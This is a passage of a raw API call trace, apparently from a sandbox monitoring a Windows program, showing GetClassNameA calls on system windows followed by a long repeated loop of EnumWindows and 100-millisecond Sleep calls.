GetClassNameA (in: hWnd=0x100f2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.421] GetClassNameA (in: hWnd=0x100e8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.421] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.421] GetClassNameA (in: hWnd=0x2003c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.421] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.421] GetClassNameA (in: hWnd=0x10076, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.421] Sleep (dwMilliseconds=0x64) [0096.538] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0096.538] GetClassNameA (in: hWnd=0x100e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0096.539] GetClassNameA (in: hWnd=0x10128, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0096.539] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0096.539] GetClassNameA (in: hWnd=0x10106, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.539] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.539] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.539] GetClassNameA (in: hWnd=0x10108, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.539] GetClassNameA (in: hWnd=0x10104, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.539] GetClassNameA (in: hWnd=0x10102, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0096.539] GetClassNameA (in: hWnd=0x10100, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.539] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0096.540] Sleep (dwMilliseconds=0x64) [0096.641] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0096.642] Sleep (dwMilliseconds=0x64) [0096.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0096.877] Sleep (dwMilliseconds=0x64) [0097.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.012] Sleep (dwMilliseconds=0x64) [0097.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.112] Sleep (dwMilliseconds=0x64) [0097.233] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.233] Sleep (dwMilliseconds=0x64) [0097.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.396] Sleep (dwMilliseconds=0x64) [0097.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.497] Sleep (dwMilliseconds=0x64) [0097.611] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.612] Sleep (dwMilliseconds=0x64) [0097.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.726] Sleep (dwMilliseconds=0x64) [0097.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.852] Sleep (dwMilliseconds=0x64) [0097.953] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0097.953] Sleep (dwMilliseconds=0x64) [0098.134] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0098.135] Sleep (dwMilliseconds=0x64) [0098.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0098.275] Sleep (dwMilliseconds=0x64) [0098.430] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0098.430] Sleep (dwMilliseconds=0x64) [0098.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0098.602] Sleep (dwMilliseconds=0x64) [0098.703] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0098.703] Sleep (dwMilliseconds=0x64) [0098.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0098.809] Sleep (dwMilliseconds=0x64) [0098.909] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0098.910] Sleep (dwMilliseconds=0x64) [0099.071] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0099.071] Sleep (dwMilliseconds=0x64) [0099.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0099.172] Sleep (dwMilliseconds=0x64) [0099.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0099.407] Sleep (dwMilliseconds=0x64) [0099.508] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0099.508] Sleep (dwMilliseconds=0x64) [0099.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0099.623] Sleep (dwMilliseconds=0x64) [0099.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0099.736] Sleep (dwMilliseconds=0x64) [0099.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0099.923] Sleep (dwMilliseconds=0x64) [0100.047] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0100.047] Sleep (dwMilliseconds=0x64) [0100.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0100.317] Sleep (dwMilliseconds=0x64) [0100.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0100.585] Sleep (dwMilliseconds=0x64) [0100.770] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0100.770] Sleep (dwMilliseconds=0x64) [0100.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0100.913] Sleep (dwMilliseconds=0x64) [0101.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0101.016] Sleep (dwMilliseconds=0x64) [0101.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0101.218] Sleep (dwMilliseconds=0x64) [0101.319] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0101.319] Sleep (dwMilliseconds=0x64) [0101.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0101.548] Sleep (dwMilliseconds=0x64) [0101.712] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0101.712] Sleep (dwMilliseconds=0x64) [0101.821] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0101.821] Sleep (dwMilliseconds=0x64) [0101.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0101.922] Sleep (dwMilliseconds=0x64) [0102.102] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0102.103] Sleep (dwMilliseconds=0x64) [0102.206] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0102.206] Sleep (dwMilliseconds=0x64) [0102.307] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0102.308] Sleep (dwMilliseconds=0x64) [0102.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0102.521] Sleep (dwMilliseconds=0x64) [0102.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0102.622] Sleep (dwMilliseconds=0x64) [0102.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0102.777] Sleep (dwMilliseconds=0x64) [0102.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0102.878] Sleep (dwMilliseconds=0x64) [0103.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0103.012] Sleep (dwMilliseconds=0x64) [0103.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0103.158] Sleep (dwMilliseconds=0x64) [0103.366] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0103.367] Sleep (dwMilliseconds=0x64) [0103.495] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0103.496] Sleep (dwMilliseconds=0x64) [0103.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0103.728] Sleep (dwMilliseconds=0x64) [0103.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0103.841] Sleep (dwMilliseconds=0x64) [0103.978] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0103.978] Sleep (dwMilliseconds=0x64) [0104.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0104.078] Sleep (dwMilliseconds=0x64) [0104.337] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0104.337] Sleep (dwMilliseconds=0x64) [0104.467] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0104.467] Sleep (dwMilliseconds=0x64) [0104.676] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0104.677] Sleep (dwMilliseconds=0x64) [0104.803] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0104.804] Sleep (dwMilliseconds=0x64) [0104.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0104.911] Sleep (dwMilliseconds=0x64) [0105.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0105.060] Sleep (dwMilliseconds=0x64) [0105.355] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0105.355] Sleep (dwMilliseconds=0x64) [0105.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0105.593] Sleep (dwMilliseconds=0x64) [0105.694] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0105.694] Sleep (dwMilliseconds=0x64) [0105.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0105.897] Sleep (dwMilliseconds=0x64) [0106.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0106.022] Sleep (dwMilliseconds=0x64) [0106.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0106.123] Sleep (dwMilliseconds=0x64) [0106.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0106.329] Sleep (dwMilliseconds=0x64) [0106.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0106.559] Sleep (dwMilliseconds=0x64) [0106.702] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0106.702] Sleep (dwMilliseconds=0x64) [0106.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0106.819] Sleep (dwMilliseconds=0x64) [0106.981] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0106.982] Sleep (dwMilliseconds=0x64) [0107.114] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0107.114] Sleep (dwMilliseconds=0x64) [0107.361] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0107.362] Sleep (dwMilliseconds=0x64) [0107.462] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0107.462] Sleep (dwMilliseconds=0x64) [0107.644] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0107.645] Sleep (dwMilliseconds=0x64) [0107.766] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0107.766] Sleep (dwMilliseconds=0x64) [0107.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0107.916] Sleep (dwMilliseconds=0x64) [0108.139] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0108.140] Sleep (dwMilliseconds=0x64) [0108.248] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0108.248] Sleep (dwMilliseconds=0x64) [0108.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0108.396] Sleep (dwMilliseconds=0x64) [0108.516] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0108.516] Sleep (dwMilliseconds=0x64) [0108.732] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0108.732] Sleep (dwMilliseconds=0x64) [0108.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0108.856] Sleep (dwMilliseconds=0x64) [0108.957] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0108.957] Sleep (dwMilliseconds=0x64) [0109.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0109.146] Sleep (dwMilliseconds=0x64) [0109.246] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0109.246] Sleep (dwMilliseconds=0x64) [0109.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0109.413] Sleep (dwMilliseconds=0x64) [0109.528] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0109.528] Sleep (dwMilliseconds=0x64) [0109.679] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0109.679] Sleep (dwMilliseconds=0x64) [0109.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0109.829] Sleep (dwMilliseconds=0x64) [0109.930] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0109.930] Sleep (dwMilliseconds=0x64) [0110.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0110.059] Sleep (dwMilliseconds=0x64) [0110.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0110.349] Sleep (dwMilliseconds=0x64) [0110.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0110.562] Sleep (dwMilliseconds=0x64) [0110.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0110.711] Sleep (dwMilliseconds=0x64) [0110.927] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0110.928] Sleep (dwMilliseconds=0x64) [0111.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0111.028] Sleep (dwMilliseconds=0x64) [0111.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0111.301] Sleep (dwMilliseconds=0x64) [0111.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0111.591] Sleep (dwMilliseconds=0x64) [0111.691] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0111.692] Sleep (dwMilliseconds=0x64) [0111.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0111.811] Sleep (dwMilliseconds=0x64) [0112.004] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0112.005] Sleep (dwMilliseconds=0x64) [0112.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0112.106] Sleep (dwMilliseconds=0x64) [0112.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0112.282] Sleep (dwMilliseconds=0x64) [0112.497] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0112.497] Sleep (dwMilliseconds=0x64) [0112.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0112.598] Sleep (dwMilliseconds=0x64) [0112.723] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0112.723] Sleep (dwMilliseconds=0x64) [0112.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0112.871] Sleep (dwMilliseconds=0x64) [0113.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.013] Sleep (dwMilliseconds=0x64) [0113.177] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.177] Sleep (dwMilliseconds=0x64) [0113.423] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.424] Sleep (dwMilliseconds=0x64) [0113.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.524] Sleep (dwMilliseconds=0x64) [0113.658] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.658] Sleep (dwMilliseconds=0x64) [0113.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.783] Sleep (dwMilliseconds=0x64) [0113.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.884] Sleep (dwMilliseconds=0x64) [0113.988] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0113.988] Sleep (dwMilliseconds=0x64) [0114.089] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.090] Sleep (dwMilliseconds=0x64) [0114.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.277] Sleep (dwMilliseconds=0x64) [0114.385] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.385] Sleep (dwMilliseconds=0x64) [0114.517] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.517] Sleep (dwMilliseconds=0x64) [0114.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.623] Sleep (dwMilliseconds=0x64) [0114.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.737] Sleep (dwMilliseconds=0x64) [0114.851] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.852] Sleep (dwMilliseconds=0x64) [0114.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0114.953] Sleep (dwMilliseconds=0x64) [0115.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0115.067] Sleep (dwMilliseconds=0x64) [0115.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0115.241] Sleep (dwMilliseconds=0x64) [0115.359] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0115.360] Sleep (dwMilliseconds=0x64) [0115.460] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0115.460] Sleep (dwMilliseconds=0x64) [0115.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0115.561] Sleep (dwMilliseconds=0x64) [0115.690] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0115.691] Sleep (dwMilliseconds=0x64) [0115.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0115.872] Sleep (dwMilliseconds=0x64) [0116.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0116.068] Sleep (dwMilliseconds=0x64) [0116.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0116.226] Sleep (dwMilliseconds=0x64) [0116.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0116.327] Sleep (dwMilliseconds=0x64) [0116.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0116.488] Sleep (dwMilliseconds=0x64) [0116.665] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0116.666] Sleep (dwMilliseconds=0x64) [0116.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0116.842] Sleep (dwMilliseconds=0x64) [0116.982] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0116.982] Sleep (dwMilliseconds=0x64) [0117.267] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0117.267] Sleep (dwMilliseconds=0x64) [0117.368] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0117.368] Sleep (dwMilliseconds=0x64) [0117.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0117.483] Sleep (dwMilliseconds=0x64) [0117.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0117.657] Sleep (dwMilliseconds=0x64) [0117.779] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0117.779] Sleep (dwMilliseconds=0x64) [0118.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0118.034] Sleep (dwMilliseconds=0x64) [0118.195] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0118.195] Sleep (dwMilliseconds=0x64) [0118.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0118.427] Sleep (dwMilliseconds=0x64) [0118.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0118.592] Sleep (dwMilliseconds=0x64) [0118.803] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0118.803] Sleep (dwMilliseconds=0x64) [0118.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0118.909] Sleep (dwMilliseconds=0x64) [0119.080] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.081] Sleep (dwMilliseconds=0x64) [0119.209] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.209] Sleep (dwMilliseconds=0x64) [0119.417] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.418] Sleep (dwMilliseconds=0x64) [0119.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.518] Sleep (dwMilliseconds=0x64) [0119.667] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.668] Sleep (dwMilliseconds=0x64) [0119.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.784] Sleep (dwMilliseconds=0x64) [0119.885] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.885] Sleep (dwMilliseconds=0x64) [0119.990] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0119.990] Sleep (dwMilliseconds=0x64) [0120.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0120.173] Sleep (dwMilliseconds=0x64) [0120.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0120.420] Sleep (dwMilliseconds=0x64) [0120.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0120.608] Sleep (dwMilliseconds=0x64) [0120.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0120.720] Sleep (dwMilliseconds=0x64) [0120.820] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0120.821] Sleep (dwMilliseconds=0x64) [0120.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0120.922] Sleep (dwMilliseconds=0x64) [0121.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.022] Sleep (dwMilliseconds=0x64) [0121.123] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.123] Sleep (dwMilliseconds=0x64) [0121.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.224] Sleep (dwMilliseconds=0x64) [0121.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.325] Sleep (dwMilliseconds=0x64) [0121.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.426] Sleep (dwMilliseconds=0x64) [0121.526] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.527] Sleep (dwMilliseconds=0x64) [0121.629] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.629] Sleep (dwMilliseconds=0x64) [0121.729] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.730] Sleep (dwMilliseconds=0x64) [0121.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.833] Sleep (dwMilliseconds=0x64) [0121.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0121.935] Sleep (dwMilliseconds=0x64) [0122.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.036] Sleep (dwMilliseconds=0x64) [0122.161] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.161] Sleep (dwMilliseconds=0x64) [0122.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.262] Sleep (dwMilliseconds=0x64) [0122.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.396] Sleep (dwMilliseconds=0x64) [0122.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.497] Sleep (dwMilliseconds=0x64) [0122.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.598] Sleep (dwMilliseconds=0x64) [0122.698] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.699] Sleep (dwMilliseconds=0x64) [0122.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.799] Sleep (dwMilliseconds=0x64) [0122.900] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0122.900] Sleep (dwMilliseconds=0x64) [0123.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.001] Sleep (dwMilliseconds=0x64) [0123.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.135] Sleep (dwMilliseconds=0x64) [0123.236] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.236] Sleep (dwMilliseconds=0x64) [0123.337] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.337] Sleep (dwMilliseconds=0x64) [0123.438] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.438] Sleep (dwMilliseconds=0x64) [0123.539] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.540] Sleep (dwMilliseconds=0x64) [0123.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.640] Sleep (dwMilliseconds=0x64) [0123.741] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.741] Sleep (dwMilliseconds=0x64) [0123.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.844] Sleep (dwMilliseconds=0x64) [0123.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0123.945] Sleep (dwMilliseconds=0x64) [0124.048] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0124.049] Sleep (dwMilliseconds=0x64) [0124.149] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0124.149] Sleep (dwMilliseconds=0x64) [0124.304] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0124.304] Sleep (dwMilliseconds=0x64) [0124.405] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0124.405] Sleep (dwMilliseconds=0x64) [0124.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0124.508] Sleep (dwMilliseconds=0x64) [0124.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0124.609] Sleep (dwMilliseconds=0x64) [0125.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.254] Sleep (dwMilliseconds=0x64) [0125.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.356] Sleep (dwMilliseconds=0x64) [0125.742] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.743] Sleep (dwMilliseconds=0x64) [0125.752] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.753] Sleep (dwMilliseconds=0x64) [0125.754] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.755] Sleep (dwMilliseconds=0x64) [0125.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.756] Sleep (dwMilliseconds=0x64) [0125.758] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.758] Sleep (dwMilliseconds=0x64) [0125.759] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.759] Sleep (dwMilliseconds=0x64) [0125.761] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.761] Sleep (dwMilliseconds=0x64) [0125.762] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.762] Sleep (dwMilliseconds=0x64) [0125.764] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.764] Sleep (dwMilliseconds=0x64) [0125.765] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.765] Sleep (dwMilliseconds=0x64) [0125.767] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.767] Sleep (dwMilliseconds=0x64) [0125.768] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.769] Sleep (dwMilliseconds=0x64) [0125.770] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.770] Sleep (dwMilliseconds=0x64) [0125.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.772] Sleep (dwMilliseconds=0x64) [0125.773] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.773] Sleep (dwMilliseconds=0x64) [0125.775] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.775] Sleep (dwMilliseconds=0x64) [0125.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.776] Sleep (dwMilliseconds=0x64) [0125.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.778] Sleep (dwMilliseconds=0x64) [0125.780] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.780] Sleep (dwMilliseconds=0x64) [0125.782] EnumWindows 